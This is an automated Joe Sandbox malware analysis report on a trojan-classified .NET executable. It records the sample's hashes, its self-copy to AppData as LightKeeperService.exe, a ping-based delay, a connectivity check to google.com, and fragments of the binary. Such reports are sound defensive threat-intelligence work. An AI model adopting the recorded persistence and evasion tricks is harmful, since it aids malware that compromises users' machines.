                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  142.250.185.100
                                                  		www.google.comUnited States
                                                  		15169GOOGLEUSfalse

                                                  Private

                                                  IP
                                                  192.168.2.1
                                                  127.0.0.1

                                                  General Information

                                                  Joe Sandbox Version:35.0.0 Citrine
                                                  Analysis ID:652396
                                                  Start date and time: 26/06/202209:46:562022-06-26 09:46:56 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 9m 57s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:atpRyiZGTE.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:31
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal96.troj.evad.winEXE@15/5@1/3
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                                  • Quality average: 84.5%
                                                  • Quality standard deviation: 1.5%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Adjust boot time
                                                  • Enable AMSI

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.223.24.244
                                                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • VT rate limit hit for: atpRyiZGTE.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  09:49:02API Interceptor184x Sleep call for process: atpRyiZGTE.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASNs

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\atpRyiZGTE.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\atpRyiZGTE.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                  C:\Users\user\AppData\Roaming\LightKeeperService.exe

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1598976
                                                  Entropy (8bit):6.542587858621466
                                                  Encrypted:false
                                                  SSDEEP:24576:hfFQnGpTDv52xFCsS4M61DPcnc4VsBKm6cCEtfG4RTRTHTM:hfFQnkV2TCo1DPcnc4VsKm6c9NxDXM
                                                  MD5:0515B4D32D6D65D19832858957F0847F
                                                  SHA1:3CB9ACC775DA6908C56890F0827398B817467E0E
                                                  SHA-256:9027302B65C696C2E079F70C18F55ABC1FD10C497B4CAD63BDBFBD8AC110B916
                                                  SHA-512:9E145260E75D7359772FAB436372CCFA249054F4CDA7E9FAFD2A67B7CC7B8166CBD1F38C73CD89737E3EA6F6D670684400250ADB26CD777080D4A203E4FD409E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 42%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......2................................. ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc...............d..............@..B.......................H.......0...x.......y... {...............................................j.?f...k.........i....12..w..1=...L.Q..(.~>.lE+.R.|../.4z.F....a.....).#.}..LB.Q~..!...@s....p..E..........^....@N...n..i.O.6.q.L.Z...C]..e......!.xf0.#.w.;..EN9Mr0..'M.\.".|.B..`l..{H.~&...<S ......p.*..&......J6.S.*x?.0E. ..Y.Y....l..!.i+.....G._.oT.........9.J.G......K.^Z... %..R.O.......z^..r.@.6.%.........POW.fj...u.mLC...Ts...8...=....\."U.dF.5..F.o...(@C...z.....S.a...}v.0.,9.

                                                  C:\Users\user\AppData\Roaming\LightKeeperService.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  \Device\Null

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\PING.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2440
                                                  Entropy (8bit):4.725663483598328
                                                  Encrypted:false
                                                  SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTd:/elAokItULVDv
                                                  MD5:CE2B4D3E2C6F89A5578B7B2574D9316A
                                                  SHA1:0B97F330E453CBCD78F3FE1C41675DF80D8BC81A
                                                  SHA-256:23F40B2D6379451ACD948C88723D09339D6386D08C068D70A9DC67EB56D3FB95
                                                  SHA-512:1AE47563977707328E8381BF37E1628B57886A9B570314D36225A628130B7F83058D5C4889C7BDF48F0719181B302985F3913264089854029098385B3D5C7E8F
                                                  Malicious:false
                                                  Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):6.542587858621466
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:atpRyiZGTE.exe
                                                  File size:1598976
                                                  MD5:0515b4d32d6d65d19832858957f0847f
                                                  SHA1:3cb9acc775da6908c56890f0827398b817467e0e
                                                  SHA256:9027302b65c696c2e079f70c18f55abc1fd10c497b4cad63bdbfbd8ac110b916
                                                  SHA512:9e145260e75d7359772fab436372ccfa249054f4cda7e9fafd2a67b7cc7b8166cbd1f38c73cd89737e3ea6f6d670684400250adb26cd777080d4a203e4fd409e
                                                  SSDEEP:24576:hfFQnGpTDv52xFCsS4M61DPcnc4VsBKm6cCEtfG4RTRTHTM:hfFQnkV2TCo1DPcnc4VsKm6c9NxDXM
                                                  TLSH:4575BEA22B857E03C03CA63E8234F54093F6FDCAA349C79D7DD5B5C666A23413BA2754
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......2................................. ........@.. ....................................`................................

                                                  File Icon

                                                  Icon Hash:8e2b6d6c6c69abcc

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x56a3fe
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x32E593FC [Wed Jan 22 04:13:48 1997 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x16a3a80x53.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x16c0000x1db00.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x18a0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x1684040x168600False0.6130488802896289data6.475046719062856IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x16c0000x1db000x1dc00False0.7296316964285714data6.869642401970742IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x18a0000xc0x200False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0x16c6280x1c57PNG image data, 128 x 128, 8-bit colormap, non-interlaced
                                                  RT_ICON0x16e2800x1628data
                                                  RT_ICON0x16f8a80xea8data
                                                  RT_ICON0x1707500x8a8data
                                                  RT_ICON0x170ff80x6c8dBase III DBT, version number 0, next free block index 40
                                                  RT_ICON0x1716c00x568GLS_BINARY_LSB_FIRST
                                                  RT_ICON0x171c280x8683PNG image data, 256 x 256, 8-bit/color RGB, non-interlaced
                                                  RT_ICON0x17a2ac0x3d5cPNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                  RT_ICON0x17e0080x4228data
                                                  RT_ICON0x1822300x25a8data
                                                  RT_ICON0x1847d80x10a8data
                                                  RT_ICON0x1858800x988data
                                                  RT_ICON0x1862080x468GLS_BINARY_LSB_FIRST
                                                  RT_ICON0x1866700x2e8data
                                                  RT_ICON0x1869580x128GLS_BINARY_LSB_FIRST
                                                  RT_ICON0x186a800x128GLS_BINARY_LSB_FIRST
                                                  RT_ICON0x186ba80x2e8data
                                                  RT_ICON0x186e900x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4294967295, next used block 4286019583
                                                  RT_ICON0x1871780x128GLS_BINARY_LSB_FIRST
                                                  RT_ICON0x1872a00x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                  RT_ICON0x187b480x568GLS_BINARY_LSB_FIRST
                                                  RT_ICON0x1880b00xca8dBase IV DBT of @.DBF, block length 3072, next free block index 40, next free block 4143380214, next used block 4143380214
                                                  RT_ICON0x188d580x368GLS_BINARY_LSB_FIRST
                                                  RT_ICON0x1890c00x468GLS_BINARY_LSB_FIRST
                                                  RT_ICON0x1895280x128GLS_BINARY_LSB_FIRST
                                                  RT_GROUP_ICON0x1896500xbcdata
                                                  RT_GROUP_ICON0x18970c0x22data
                                                  RT_GROUP_ICON0x1897300x22data
                                                  RT_GROUP_ICON0x1897540x5adata
                                                  RT_GROUP_ICON0x1897b00x22data
                                                  RT_VERSION0x1897d40x32cdataEnglishUnited States

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jun 26, 2022 09:48:20.692310095 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:20.692351103 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:20.692446947 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:20.764801979 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:20.764837980 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:20.817599058 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:20.817701101 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:20.821000099 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:20.821022034 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:20.821403027 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.009613037 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.224230051 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.264503002 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.283855915 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.283974886 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.284046888 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.284091949 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.284181118 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.284250975 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.284262896 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.284284115 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.284348965 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.284708977 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.285936117 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.286016941 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.286029100 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.286052942 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.286099911 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.287271976 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.288619995 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.288696051 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.288716078 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.288743973 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.288794994 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.300412893 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.300869942 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.300940037 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.300992966 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.301035881 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.301119089 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.302185059 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.303555012 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.303637981 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.303685904 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.303713083 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.303775072 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.304765940 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.306030989 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.306128025 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.306149006 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.307329893 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.307384968 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.307414055 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.307430983 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.307475090 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.308541059 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.309636116 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.309689999 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.309756994 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.309781075 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.309827089 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.310713053 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.311939001 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.312007904 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.312042952 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.312062025 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.312105894 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.312947989 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.314049959 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.314114094 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.314165115 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.314188957 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.314249039 CEST44349746142.250.185.100192.168.2.4
                                                  Jun 26, 2022 09:48:21.314279079 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.314316034 CEST49746443192.168.2.4142.250.185.100
                                                  Jun 26, 2022 09:48:21.326067924 CEST49746443192.168.2.4142.250.185.100

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jun 26, 2022 09:48:20.636743069 CEST6050653192.168.2.48.8.8.8
                                                  Jun 26, 2022 09:48:20.662038088 CEST53605068.8.8.8192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Jun 26, 2022 09:48:20.636743069 CEST192.168.2.48.8.8.80xc6daStandard query (0)www.google.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Jun 26, 2022 09:48:20.662038088 CEST8.8.8.8192.168.2.40xc6daNo error (0)www.google.com142.250.185.100A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.google.com

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.449746142.250.185.100443C:\Users\user\Desktop\atpRyiZGTE.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-06-26 07:48:21 UTC0OUTGET / HTTP/1.1
                                                  Host: www.google.com
                                                  Connection: Keep-Alive
                                                  2022-06-26 07:48:21 UTC0INHTTP/1.1 200 OK
                                                  Date: Sun, 26 Jun 2022 07:48:21 GMT
                                                  Expires: -1
                                                  Cache-Control: private, max-age=0
                                                  Content-Type: text/html; charset=ISO-8859-1
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Server: gws
                                                  X-XSS-Protection: 0
                                                  X-Frame-Options: SAMEORIGIN
                                                  Set-Cookie: AEC=AakniGPWn24ct2sLJwkW8tir5SqQA7-iC8qNpsQ5GdxWywSGbxpJrJNDqg; expires=Fri, 23-Dec-2022 07:48:21 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                  Set-Cookie: __Secure-ENID=5.SE=X8yGHJuvgnzc55XoNk8_Mza3nrf_VAoZchfNhOXPFcbqcmgj1aewySqRYSnGFa0ilk8eMV4EXP5nkNk3gV51yHqvAH8wD5DgmNpHFFfLVYb-7qDKKviaOiPYs4cwftZ1orAh6t7MMg7MqKj8TIZ_ACF7qCnLvdxGp80kbDkVtx8; expires=Thu, 27-Jul-2023 00:06:39 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                  Set-Cookie: CONSENT=PENDING+312; expires=Tue, 25-Jun-2024 07:48:21 GMT; path=/; domain=.google.com; Secure
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
